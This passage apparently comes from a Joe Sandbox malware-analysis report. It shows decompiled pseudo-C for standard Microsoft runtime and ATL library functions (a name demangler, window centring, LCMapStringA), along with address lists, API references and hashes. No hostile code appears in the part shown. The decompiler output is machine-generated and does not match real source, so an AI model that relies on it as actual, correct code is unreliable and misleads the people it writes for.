                      												break;
                      											}
                      											__edx =  *0xb30640;
                      											__eax =  *( *0xb30640);
                      											__eflags =  *( *0xb30640) - 0x40;
                      											if( *( *0xb30640) == 0x40) {
                      												break;
                      											}
                      											__ecx =  *0xb30640;
                      											_v13 =  *( *0xb30640);
                      											 *0xb30640 =  *0xb30640 + 1;
                      											 *0xb30640 =  *0xb30640 + 1;
                      											__ecx = _v13 & 0x000000ff;
                      											__ecx =  &_v168;
                      											__eax = E0095FDE0( &_v168, _v13 & 0x000000ff);
                      										}
                      										__edx =  *0xb30640;
                      										__eax =  *( *0xb30640);
                      										__eflags =  *( *0xb30640) - 0x40;
                      										if( *( *0xb30640) == 0x40) {
                      											__ecx =  *0xb30640;
                      											__ecx =  *0xb30640 + 1;
                      											__eflags = __ecx;
                      											 *0xb30640 = __ecx;
                      										}
                      										__edx =  &_v168;
                      										__ecx = _a4;
                      										E0095F240(_a4,  &_v168) = _a4;
                      										return _a4;
                      									case 3:
                      										__eax =  *0xb30640;
                      										__ecx =  *( *0xb30640);
                      										_v124 =  *( *0xb30640);
                      										 *0xb30640 =  *0xb30640 + 1;
                      										 *0xb30640 =  *0xb30640 + 1;
                      										__eflags = _v124 - 0x32;
                      										if(_v124 != 0x32) {
                      											__ecx = _a4;
                      											E0095F350(_a4, 2) = _a4;
                      											return _a4;
                      										}
                      										_a4 = E00969D50(__ebx, __edi, __esi, _a4);
                      										__eax = _a4;
                      										return _a4;
                      								}
                      							case 0xc:
                      								goto L71;
                      						}
                      					case 6:
                      						goto L73;
                      				}
                      			}


























































                      0x0096617e
                      0x00000000
                      0x00000000
                      0x009664dd
                      0x009664e3
                      0x009664e6
                      0x009664ef
                      0x009664f2
                      0x009664f8
                      0x009664fb
                      0x009664fe
                      0x00966502
                      0x00966511
                      0x00966514
                      0x0096651b
                      0x00966523
                      0x00000000
                      0x00966523
                      0x00966504
                      0x00966508
                      0x0096652b
                      0x0096652f
                      0x00966536
                      0x0096653e
                      0x00966544
                      0x00966549
                      0x00966550
                      0x00966558
                      0x00000000
                      0x00966558
                      0x00966562
                      0x0096656a
                      0x00000000
                      0x00000000
                      0x009661c0
                      0x009661c5
                      0x009661c8
                      0x009661ce
                      0x009661d2
                      0x009661da
                      0x009661e2
                      0x00000000
                      0x00000000
                      0x0096618b
                      0x00966196
                      0x0096619e
                      0x009661a4
                      0x009661a9
                      0x009661b0
                      0x009661b8
                      0x00000000
                      0x00000000
                      0x009661ea
                      0x009661ef
                      0x009661f2
                      0x009661f7
                      0x009661fb
                      0x00966203
                      0x0096620f
                      0x00966216
                      0x0096621f
                      0x00966222
                      0x00966227
                      0x0096622a
                      0x0096622f
                      0x00966231
                      0x00966251
                      0x00966251
                      0x00966255
                      0x00966259
                      0x00966261
                      0x00000000
                      0x00966261
                      0x00966233
                      0x00966236
                      0x0096623b
                      0x0096623d
                      0x00000000
                      0x00000000
                      0x00966241
                      0x00966249
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00966273
                      0x00966278
                      0x0096627b
                      0x00966281
                      0x00966285
                      0x0096628d
                      0x00966290
                      0x00966295
                      0x0096629a
                      0x0096629d
                      0x009662a3
                      0x009662a7
                      0x009662a9
                      0x009662c1
                      0x009662c6
                      0x009662c9
                      0x009662ce
                      0x009662d2
                      0x009662d2
                      0x009662d5
                      0x009662d8
                      0x009662e0
                      0x009662e2
                      0x009662ea
                      0x00000000
                      0x009662ea
                      0x009662da
                      0x009662de
                      0x009662f2
                      0x009662f5
                      0x009662fd
                      0x00966300
                      0x00966305
                      0x0096630b
                      0x0096630e
                      0x00966316
                      0x00966319
                      0x0096631e
                      0x00966321
                      0x00966327
                      0x0096632a
                      0x0096632d
                      0x00966331
                      0x00966496
                      0x00966499
                      0x009664a1
                      0x009664a9
                      0x00000000
                      0x009664a9
                      0x00966337
                      0x0096633a
                      0x00000000
                      0x00966343
                      0x0096634a
                      0x00966354
                      0x0096635b
                      0x00966366
                      0x00966369
                      0x0096636d
                      0x00966374
                      0x0096637c
                      0x0096637f
                      0x00966383
                      0x00966387
                      0x0096638f
                      0x00000000
                      0x00000000
                      0x0096639c
                      0x009663a0
                      0x009663a4
                      0x009663ac
                      0x009663bb
                      0x009663c0
                      0x009663c7
                      0x009663ca
                      0x009663d0
                      0x009663d3
                      0x009663d8
                      0x009663e7
                      0x009663ec
                      0x009663f3
                      0x009663f6
                      0x009663fc
                      0x009663ff
                      0x00966404
                      0x00966413
                      0x00966418
                      0x0096641f
                      0x00966422
                      0x00966428
                      0x00966432
                      0x00966441
                      0x00966446
                      0x0096644d
                      0x00966450
                      0x00966456
                      0x00966459
                      0x00966460
                      0x00966464
                      0x0096646c
                      0x00000000
                      0x00000000
                      0x00966476
                      0x0096647a
                      0x0096647e
                      0x00966486
                      0x00000000
                      0x00000000
                      0x0096633a
                      0x00000000
                      0x009662de
                      0x009662ad
                      0x009662b1
                      0x009662b9
                      0x00000000
                      0x00000000
                      0x009664b6
                      0x009664bb
                      0x009664be
                      0x009664c4
                      0x009664c8
                      0x009664d0
                      0x009664d3
                      0x009667a5
                      0x009667b6
                      0x009667b6
                      0x009667ba
                      0x009667c6
                      0x009667c6
                      0x009667c9
                      0x009667ce
                      0x009667d0
                      0x009667e1
                      0x009667e7
                      0x009667ed
                      0x009667ed
                      0x009667f1
                      0x009667f1
                      0x009667f8
                      0x009667ff
                      0x00966808
                      0x00966808
                      0x0096680b
                      0x0096680b
                      0x009667bc
                      0x009667bc
                      0x009667bc
                      0x009667bf
                      0x009667bf
                      0x00966810
                      0x00966810
                      0x00966814
                      0x0096681c
                      0x00000000
                      0x00000000
                      0x00966577
                      0x0096657c
                      0x0096657f
                      0x00966588
                      0x0096658b
                      0x00966591
                      0x00966594
                      0x0096659a
                      0x0096659d
                      0x009665a0
                      0x009665a4
                      0x00966784
                      0x0096678c
                      0x00000000
                      0x0096678c
                      0x009665aa
                      0x009665ad
                      0x00000000
                      0x009665b4
                      0x009665b9
                      0x009665bc
                      0x009665c2
                      0x009665c6
                      0x009665ce
                      0x009665d6
                      0x00000000
                      0x00000000
                      0x009665de
                      0x009665e3
                      0x009665e6
                      0x009665ec
                      0x009665f0
                      0x009665f8
                      0x009665fb
                      0x00966600
                      0x00966606
                      0x00966609
                      0x0096660c
                      0x00966643
                      0x0096664a
                      0x00966653
                      0x00966656
                      0x0096660e
                      0x00966615
                      0x0096661e
                      0x00966621
                      0x00966626
                      0x0096662c
                      0x0096662f
                      0x00966632
                      0x00966634
                      0x00966639
                      0x00966639
                      0x0096663c
                      0x0096663c
                      0x00966641
                      0x0096666a
                      0x00966670
                      0x00966676
                      0x0096667d
                      0x00966685
                      0x00966689
                      0x00966691
                      0x00000000
                      0x00000000
                      0x0096669e
                      0x009666a3
                      0x009666a3
                      0x009666a6
                      0x009666ab
                      0x009666af
                      0x009666b7
                      0x009666bd
                      0x009666c2
                      0x009666c2
                      0x009666c7
                      0x009666ca
                      0x009666cc
                      0x00000000
                      0x00000000
                      0x009666ce
                      0x009666d4
                      0x009666d7
                      0x009666da
                      0x00000000
                      0x00000000
                      0x009666dc
                      0x009666e4
                      0x009666ec
                      0x009666ef
                      0x009666f4
                      0x009666f9
                      0x009666ff
                      0x009666ff
                      0x00966706
                      0x0096670c
                      0x0096670f
                      0x00966712
                      0x00966714
                      0x0096671a
                      0x0096671a
                      0x0096671d
                      0x0096671d
                      0x00966723
                      0x0096672a
                      0x00966732
                      0x00000000
                      0x00000000
                      0x0096673c
                      0x00966741
                      0x00966744
                      0x0096674d
                      0x00966750
                      0x00966756
                      0x0096675a
                      0x00966772
                      0x0096677a
                      0x00000000
                      0x0096677a
                      0x00966760
                      0x00966768
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965E8C
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965E94
                      • DName::DName.LIBVCRUNTIMED ref: 00965EF4
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965F04
                      • operator+.LIBVCRUNTIMED ref: 00965F2E
                      • DName::operator+=.LIBCMTD ref: 00965F54
                      • DName::operator+=.LIBCMTD ref: 00965F5E
                      • Mailbox.LIBCMTD ref: 00965F82
                      • DName::DName.LIBVCRUNTIMED ref: 009660DD
                      • DName::DName.LIBVCRUNTIMED ref: 009667AC
                      • DName::setIsUDC.LIBCMTD ref: 009667BF
                      • DName::isEmpty.LIBCMTD ref: 009667C9
                      • operator+.LIBVCRUNTIMED ref: 009667FF
                      • Mailbox.LIBCMTD ref: 0096680B
                      • Mailbox.LIBCMTD ref: 00966817
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Iterator_baseIterator_base::_MailboxNameName::std::_$Name::operator+=operator+$EmptyName::isName::set
                      • String ID: _$operator
                      • API String ID: 2065213285-3322683124
                      • Opcode ID: 23bb6f8888956ba4c618a3b3601bf24cfc1d3cdf8d93434c9950a3bbe578baba
                      • Instruction ID: d50bd39e6945baa591b2e3238b7add79a079259eb8af656a8d7149d48acf4e97
                      • Opcode Fuzzy Hash: 23bb6f8888956ba4c618a3b3601bf24cfc1d3cdf8d93434c9950a3bbe578baba
                      • Instruction Fuzzy Hash: 32A194709105199FDB08EF65DCA2BEE7B75BF90301F108069F9065B2A6EF706A48CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E00954E60(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4) {
                      				signed int _v8;
                      				struct HWND__** _v12;
                      				signed int _v16;
                      				struct tagRECT _v36;
                      				struct tagRECT _v60;
                      				struct tagRECT _v84;
                      				struct HWND__* _v92;
                      				signed int _v96;
                      				struct HMONITOR__* _v100;
                      				struct HWND__* _v104;
                      				intOrPtr _v116;
                      				intOrPtr _v120;
                      				intOrPtr _v124;
                      				struct tagMONITORINFO _v148;
                      				struct HWND__* _v156;
                      				int _v160;
                      				intOrPtr _v164;
                      				intOrPtr _v168;
                      				int _v172;
                      				int _v176;
                      				struct HWND__* _v180;
                      				int _v184;
                      				signed int _t117;
                      				void* _t121;
                      				struct HWND__* _t127;
                      				int _t129;
                      				int _t131;
                      				int _t134;
                      				int _t137;
                      				int _t140;
                      				int _t157;
                      				void* _t158;
                      				void* _t160;
                      				int _t165;
                      				void* _t166;
                      				void* _t167;
                      				int _t171;
                      				void* _t173;
                      				int _t175;
                      				void* _t179;
                      				struct HWND__* _t187;
                      				void* _t191;
                      				void* _t192;
                      				struct HWND__** _t196;
                      				int _t218;
                      				int _t231;
                      				intOrPtr _t237;
                      				void* _t242;
                      				void* _t251;
                      				void* _t252;
                      				signed int _t267;
                      				void* _t268;
                      				void* _t269;
                      
                      				_t192 = __ebx;
                      				_push(__ecx);
                      				_t251 =  &_v184;
                      				memset(_t251, 0xcccccccc, 0x2d << 2);
                      				_t269 = _t268 + 0xc;
                      				_t252 = _t251 + 0x2d;
                      				_pop(_t196);
                      				_t117 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t117 ^ _t267;
                      				_v12 = _t196;
                      				_t254 = _t269;
                      				_t121 = E009D1520(IsWindow( *_v12), _t269 - _t269);
                      				_t272 = _t121;
                      				if(_t121 == 0) {
                      					_t191 = L00994930(_t272, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x812, 0, "%ls", L"::IsWindow(m_hWnd)");
                      					_t269 = _t269 + 0x18;
                      					if(_t191 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_v16 = E00954DE0(_v12, _t254);
                      				if(_a4 == 0) {
                      					if((_v16 & 0x40000000) == 0) {
                      						_t187 = GetWindow( *_v12, 4);
                      						__eflags = _t269 - _t269;
                      						_a4 = E009D1520(_t187, __eflags);
                      					} else {
                      						_a4 = E009D1520(GetParent( *_v12), _t269 - _t269);
                      					}
                      				}
                      				_t125 = E009D1520(GetWindowRect( *_v12,  &_v36), _t269 - _t269);
                      				_t231 = _v16 & 0x40000000;
                      				if(_t231 != 0) {
                      					_t127 = GetParent( *_v12);
                      					__eflags = _t269 - _t269;
                      					_v92 = E009D1520(_t127, _t269 - _t269);
                      					_t129 = IsWindow(_v92);
                      					__eflags = _t269 - _t269;
                      					__eflags = E009D1520(_t129, _t269 - _t269);
                      					if(__eflags == 0) {
                      						_t167 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x84a, 0, "%ls", L"::IsWindow(hWndParent)");
                      						_t269 = _t269 + 0x18;
                      						__eflags = _t167 - 1;
                      						if(_t167 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					_t131 = GetClientRect(_v92,  &_v60);
                      					__eflags = _t269 - _t269;
                      					E009D1520(_t131, _t269 - _t269);
                      					_t134 = IsWindow(_a4);
                      					__eflags = _t269 - _t269;
                      					__eflags = E009D1520(_t134, _t269 - _t269);
                      					if(__eflags == 0) {
                      						_t166 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x84d, 0, "%ls", L"::IsWindow(hWndCenter)");
                      						_t269 = _t269 + 0x18;
                      						__eflags = _t166 - 1;
                      						if(_t166 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					_t137 = GetClientRect(_a4,  &_v84);
                      					__eflags = _t269 - _t269;
                      					E009D1520(_t137, _t269 - _t269);
                      					_t140 = MapWindowPoints(_a4, _v92,  &_v84, 2);
                      					__eflags = _t269 - _t269;
                      					E009D1520(_t140, _t269 - _t269);
                      					L45:
                      					_v164 = _v36.right - _v36.left;
                      					_t237 = _v36.bottom - _v36.top;
                      					_v168 = _t237;
                      					asm("cdq");
                      					asm("cdq");
                      					_v172 = (_v84.left + _v84.right - _t237 >> 1) - (_v164 - _t237 >> 1);
                      					asm("cdq");
                      					asm("cdq");
                      					_v176 = (_v84.top + _v84.bottom - _t237 >> 1) - (_v168 - _t237 >> 1);
                      					__eflags = _v172 + _v164 - _v60.right;
                      					if(_v172 + _v164 > _v60.right) {
                      						_t165 = _v60.right - _v164;
                      						__eflags = _t165;
                      						_v172 = _t165;
                      					}
                      					__eflags = _v172 - _v60.left;
                      					if(_v172 < _v60.left) {
                      						_v172 = _v60.left;
                      					}
                      					__eflags = _v176 + _v168 - _v60.bottom;
                      					if(_v176 + _v168 > _v60.bottom) {
                      						_t218 = _v60.bottom - _v168;
                      						__eflags = _t218;
                      						_v176 = _t218;
                      					}
                      					__eflags = _v176 - _v60.top;
                      					if(_v176 < _v60.top) {
                      						_v176 = _v60.top;
                      					}
                      					_t262 = _t269;
                      					_t231 = _v172;
                      					_t157 = SetWindowPos( *_v12, 0, _t231, _v176, 0xffffffff, 0xffffffff, 0x15);
                      					__eflags = _t269 - _t269;
                      					_t158 = E009D1520(_t157, _t269 - _t269);
                      					L54:
                      					E009D14C0(_t267, 0x955304);
                      					_t160 = _t158;
                      					_t242 = _t231;
                      					return E009D1520(E00957280(_t160, _t192, _v8 ^ _t267, _t242, _t252, _t262), _t267 - _t269 + 0xb4);
                      				}
                      				if(_a4 == 0) {
                      					L12:
                      					_v100 = 0;
                      					if(_a4 == 0) {
                      						_t262 = _t269;
                      						_t231 =  *_v12;
                      						__imp__MonitorFromWindow(_t231, 2);
                      						__eflags = _t269 - _t269;
                      						_v100 = E009D1520(_t125, __eflags);
                      					} else {
                      						_t262 = _t269;
                      						__imp__MonitorFromWindow(_a4, 2);
                      						_v100 = E009D1520(_a4, _t269 - _t269);
                      					}
                      					do {
                      						if(_v100 == 0) {
                      							_v180 = 0;
                      						} else {
                      							_v180 = 1;
                      						}
                      						_v104 = _v180;
                      						_t286 = _v104;
                      						if(_v104 == 0) {
                      							_t179 = L00994930(_t286, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x838, 0, "%ls", L"__atl_condVal");
                      							_t269 = _t269 + 0x18;
                      							if(_t179 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						if(_v104 == 0) {
                      							_t158 = 0;
                      							goto L54;
                      						}
                      						_t231 = 0;
                      						__eflags = 0;
                      					} while (0 != 0);
                      					_v148.cbSize = 0x28;
                      					_t262 = _t269;
                      					_t171 = GetMonitorInfoA(_v100,  &_v148);
                      					__eflags = _t269 - _t269;
                      					_v156 = E009D1520(_t171, _t269 - _t269);
                      					while(1) {
                      						__eflags = _v156;
                      						if(_v156 == 0) {
                      							_v184 = 0;
                      						} else {
                      							_v184 = 1;
                      						}
                      						_t231 = _v184;
                      						_v160 = _t231;
                      						__eflags = _v160;
                      						if(__eflags == 0) {
                      							_t173 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x83d, 0, "%ls", L"__atl_condVal");
                      							_t269 = _t269 + 0x18;
                      							__eflags = _t173 - 1;
                      							if(_t173 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v160;
                      						if(_v160 == 0) {
                      							break;
                      						}
                      						__eflags = 0;
                      						if(0 != 0) {
                      							continue;
                      						}
                      						_v60.left = _v148.rcWork;
                      						_v60.top = _v124;
                      						_v60.right = _v120;
                      						_v60.bottom = _v116;
                      						__eflags = _a4;
                      						if(_a4 != 0) {
                      							_t175 = GetWindowRect(_a4,  &_v84);
                      							__eflags = _t269 - _t269;
                      							E009D1520(_t175, _t269 - _t269);
                      						} else {
                      							_v84.left = _v60.left;
                      							_v84.top = _v60.top;
                      							_v84.right = _v60.right;
                      							_v84.bottom = _v60.bottom;
                      						}
                      						goto L45;
                      					}
                      					_t158 = 0;
                      					goto L54;
                      				}
                      				_v96 = E009D1520(GetWindowLongA(_a4, 0xfffffff0), _t269 - _t269);
                      				if((_v96 & 0x10000000) == 0) {
                      					L11:
                      					_a4 = 0;
                      					goto L12;
                      				}
                      				_t231 = _v96 & 0x20000000;
                      				if(_t231 == 0) {
                      					goto L12;
                      				}
                      				goto L11;
                      			}

























































                      APIs
                      • IsWindow.USER32 ref: 00954E94
                      • GetParent.USER32 ref: 00954EEE
                      • GetWindow.USER32(?,00000004), ref: 00954F0A
                      • GetWindowRect.USER32 ref: 00954F26
                      • GetWindowLongA.USER32 ref: 00954F50
                      • MonitorFromWindow.USER32(00000000,00000002), ref: 00954F92
                      • MonitorFromWindow.USER32(?,00000002), ref: 00954FAE
                      • GetMonitorInfoA.USER32 ref: 00955037
                      • GetWindowRect.USER32 ref: 009550FA
                      • GetParent.USER32 ref: 00955114
                      • IsWindow.USER32(?), ref: 0095512A
                      • GetClientRect.USER32 ref: 0095516B
                      • IsWindow.USER32(00000000), ref: 0095517E
                      • GetClientRect.USER32 ref: 009551BF
                      • MapWindowPoints.USER32 ref: 009551DC
                      • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,?,?), ref: 009552C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009552DE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Rect$Monitor$ClientFromParent$CheckInfoLongPointsStackVars@8
                      • String ID: %ls$($::IsWindow(hWndCenter)$::IsWindow(hWndParent)$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$__atl_condVal
                      • API String ID: 1557619299-489089659
                      • Opcode ID: 300f33ea4a876eb743a60ea384f8c9206f062899668a11f65dd6eb21d200ac5a
                      • Instruction ID: 07a252c3905a8780bdada291b6ab18d553ef0c9dad48c5d420e0668221aad260
                      • Opcode Fuzzy Hash: 300f33ea4a876eb743a60ea384f8c9206f062899668a11f65dd6eb21d200ac5a
                      • Instruction Fuzzy Hash: 7BD1A171E40218AFCB20DFA9DC86B9DBBB5BF84315F108259F919AB281D7749D84CF81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009B8BF0(intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                      				signed int _v8;
                      				char _v12;
                      				char _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				intOrPtr _v80;
                      				char _v84;
                      				char _v88;
                      				signed int _t130;
                      				void* _t133;
                      				void* _t140;
                      				void* _t144;
                      				void* _t149;
                      				intOrPtr _t179;
                      				intOrPtr _t198;
                      				intOrPtr _t202;
                      				void* _t272;
                      				void* _t273;
                      				void* _t274;
                      				void* _t275;
                      				void* _t276;
                      
                      				if(_a20 > 0) {
                      					_t202 = E009C2B80(_a16, _a20);
                      					_t272 = _t272 + 8;
                      					_v28 = _t202;
                      					if(_v28 >= _a20) {
                      						_a20 = _v28;
                      					} else {
                      						_a20 = _v28 + 1;
                      					}
                      				}
                      				_v8 = 0;
                      				if(_a32 == 0) {
                      					_a32 =  *((intOrPtr*)( *_a4 + 8));
                      				}
                      				if(_a36 == 0) {
                      					_v32 = 1;
                      				} else {
                      					_v32 = 9;
                      				}
                      				_t130 = E009B0990(_a32, _v32, _a16, _a20, 0, 0);
                      				_t273 = _t272 + 0x18;
                      				_v20 = _t130;
                      				if(_v20 != 0) {
                      					_t133 = E009B5110(_v20 << 1);
                      					_t274 = _t273 + 4;
                      					if(_t133 == 0) {
                      						_v36 = 0;
                      					} else {
                      						_t198 = E009B5140(E00999580(E009B5110(_v20 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\lcmapstringa.cpp", 0x6a), 0xdddd);
                      						_t274 = _t274 + 0x1c;
                      						_v36 = _t198;
                      					}
                      					E009B5090( &_v12,  *((intOrPtr*)(E009B50B0( &_v84, _v36))));
                      					if((E009B8BC0( &_v12) & 0x000000ff) != 0) {
                      						_t140 = E009B0990(_a32, 1, _a16, _a20, E009B50F0( &_v12), _v20);
                      						_t275 = _t274 + 0x18;
                      						if(_t140 != 0) {
                      							_v8 = E009A3D90(_a8, _a12, E009B50F0( &_v12), _v20, 0, 0, 0, 0, 0);
                      							if(_v8 != 0) {
                      								if((_a12 & 0x00000400) == 0) {
                      									_v24 = _v8;
                      									_t144 = E009B5110(_v24 << 1);
                      									_t276 = _t275 + 4;
                      									if(_t144 == 0) {
                      										_v40 = 0;
                      									} else {
                      										_t179 = E009B5140(E00999580(E009B5110(_v24 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\lcmapstringa.cpp", 0xa3), 0xdddd);
                      										_t276 = _t276 + 0x1c;
                      										_v40 = _t179;
                      									}
                      									E009B5090( &_v16,  *((intOrPtr*)(E009B50B0( &_v88, _v40))));
                      									if((E009B8BC0( &_v16) & 0x000000ff) != 0) {
                      										_t149 = E009B50F0( &_v16);
                      										_v8 = E009A3D90(_a8, _a12, E009B50F0( &_v12), _v20, _t149, _v24, 0, 0, 0);
                      										if(_v8 != 0) {
                      											if(_a28 != 0) {
                      												_v8 = E009B0A90(_a32, 0, E009B50F0( &_v16), _v24, _a24, _a28, 0, 0);
                      												if(_v8 != 0) {
                      													L40:
                      													E009B50D0( &_v16);
                      													L41:
                      													_v80 = _v8;
                      													E009B50D0( &_v12);
                      													return _v80;
                      												}
                      												_v76 = _v8;
                      												E009B50D0( &_v16);
                      												E009B50D0( &_v12);
                      												return _v76;
                      											}
                      											_v8 = E009B0A90(_a32, 0, E009B50F0( &_v16), _v24, 0, 0, 0, 0);
                      											if(_v8 != 0) {
                      												goto L40;
                      											}
                      											_v72 = _v8;
                      											E009B50D0( &_v16);
                      											E009B50D0( &_v12);
                      											return _v72;
                      										}
                      										_v68 = _v8;
                      										E009B50D0( &_v16);
                      										E009B50D0( &_v12);
                      										return _v68;
                      									} else {
                      										_v64 = 0;
                      										E009B50D0( &_v16);
                      										E009B50D0( &_v12);
                      										return _v64;
                      									}
                      								}
                      								if(_a28 == 0) {
                      									L26:
                      									goto L41;
                      								}
                      								if(_v8 <= _a28) {
                      									_v8 = E009A3D90(_a8, _a12, E009B50F0( &_v12), _v20, _a24, _a28, 0, 0, 0);
                      									if(_v8 != 0) {
                      										goto L26;
                      									}
                      									_v60 = _v8;
                      									E009B50D0( &_v12);
                      									return _v60;
                      								}
                      								_v56 = 0;
                      								E009B50D0( &_v12);
                      								return _v56;
                      							}
                      							_v52 = _v8;
                      							E009B50D0( &_v12);
                      							return _v52;
                      						}
                      						_v48 = _v8;
                      						E009B50D0( &_v12);
                      						return _v48;
                      					} else {
                      						_v44 = 0;
                      						E009B50D0( &_v12);
                      						return _v44;
                      					}
                      				} else {
                      					return 0;
                      				}
                      			}


                      APIs
                      • __wcstombs_l.LIBCMTD ref: 009B8CB3
                      • __MarkAllocaS.LIBCMTD ref: 009B8CBC
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009B8CD7
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009B8CE2
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B8D00
                        • Part of subcall function 009B0990: MultiByteToWideChar.KERNEL32(00000000,CCCCCCCC,?,?,?,?,?,?,00000000,CCCCCCCC), ref: 009B09C3
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B8D3D
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B8D80
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp, xrefs: 009B8C9D, 009B8E2B
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiWide__wcstombs_l
                      • String ID: minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
                      • API String ID: 3719586419-1038314930
                      • Opcode ID: f5f54925239880f99aba0052346bb5ff81753ed728d49169028e23ac39eadbbf
                      • Instruction ID: e12e537852cade0548b6d602eb25ffc15dc67206c13357b30d23ae6dd1959326
                      • Opcode Fuzzy Hash: f5f54925239880f99aba0052346bb5ff81753ed728d49169028e23ac39eadbbf
